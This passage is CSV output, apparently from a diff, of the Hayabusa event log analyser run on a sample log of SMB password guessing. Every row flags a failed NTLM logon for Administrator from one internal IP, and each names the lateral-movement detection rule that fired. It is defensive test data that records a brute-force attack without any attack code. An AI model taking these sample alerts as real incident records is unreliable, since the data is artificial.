+2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FnoHQf7QDxoI4tel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqkbgrtBa5VFxPry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TMD57GtY15bfWBre | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3lT9UgWr82PcAjf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SpwhTfFlvvccnI5N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 10CfKdnvWf4UVuME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYLMax3okIqntHM1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qk9TPAK51EdVORwY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVKRUnNu2nGslW7P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJ2AYRLcMbMVixg6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Sl9ucxM2Nu3xjNq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AFeBGB6qA7OaYV7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLUEKG9CzQYsH3Vp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVZ44YKdRYY59zaC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: umU8pDDZFvvUVsHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nn7rA0uRegtHgaF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dgiakCKweT4GUGD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kptipiLujNVePYfy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: plaXJ1rEGpU3SzV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I4pALF2luLfg36GC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZLO4cufbFcRhRy8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a845OfrFKxy31Yhg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QnPM7uhs8y4BaP6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fW5FzQ4jbWDJxXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huKy3ruTPAlx94pI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g78Kx7hkMuUGIoX1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: erSXtXvMi8Cg1PWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VaqXgO2US87zoXLl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHEfAfFuAR2pX3LO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4Owk2elGaC5DOm1U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VXPynWzVNADN56a4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwfwZ0hXFaFwqymH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYlZwLsvrsuqUZ4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvGrzr30eVl5TGhA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tqdJcHWbdGcIIHBr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDt69bIJ1yI6PXLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtE2uMuOe8QPAKOj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BWQDlZDgFj9NmMhJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncQiyLyHCXr8knGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XjVmLfmcPMYbmdin | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gU2HjzjDxHsnvENI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cUPn5CEz2LtwRwvZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCz069oBFXqpshbU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dzhc9PVRVP69tshD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejA3ZNfKWEs8zAMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U5egiL2PGOrYCHv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYhIM3zla6KcbKbM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjyQJnVBO4iC9Tkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g6Tpp8TRa2nRxHzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DyLvo5Bn2HzyANdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaXNThuZDGqJ7oCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 42Sb7p19cQsEV30b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: An6629wgflzSgqY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iO7JktEihqddmEtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nG97BFOgKxnZaqi4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SH2D24c6nRGDL4Oe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiu2yfaM2JQQZoLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YQx9PG8DtR2tMjvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OoAWryajKhLD7RyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgewSeaVugP1TXss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPMCPdCAnz4upz8X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dUbV6xnGeBWE8Dif | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIJ9mZczFO1GKItV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wW0vxE4o68L70Sra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOn9DzB1yWtntyX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m9uGgocAVReiJWDm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qm9Jf1fles2HOb3g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ev5eTWdf3CskOMuh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoiMO6sSLOm4fOD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDjvMsa2IgR9KO7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SR7gVjxHZDYeK7pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4jzGAepr7JeNKuuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H9baxEeRCWjx6Fzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uy7aTt0B4ErguacA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
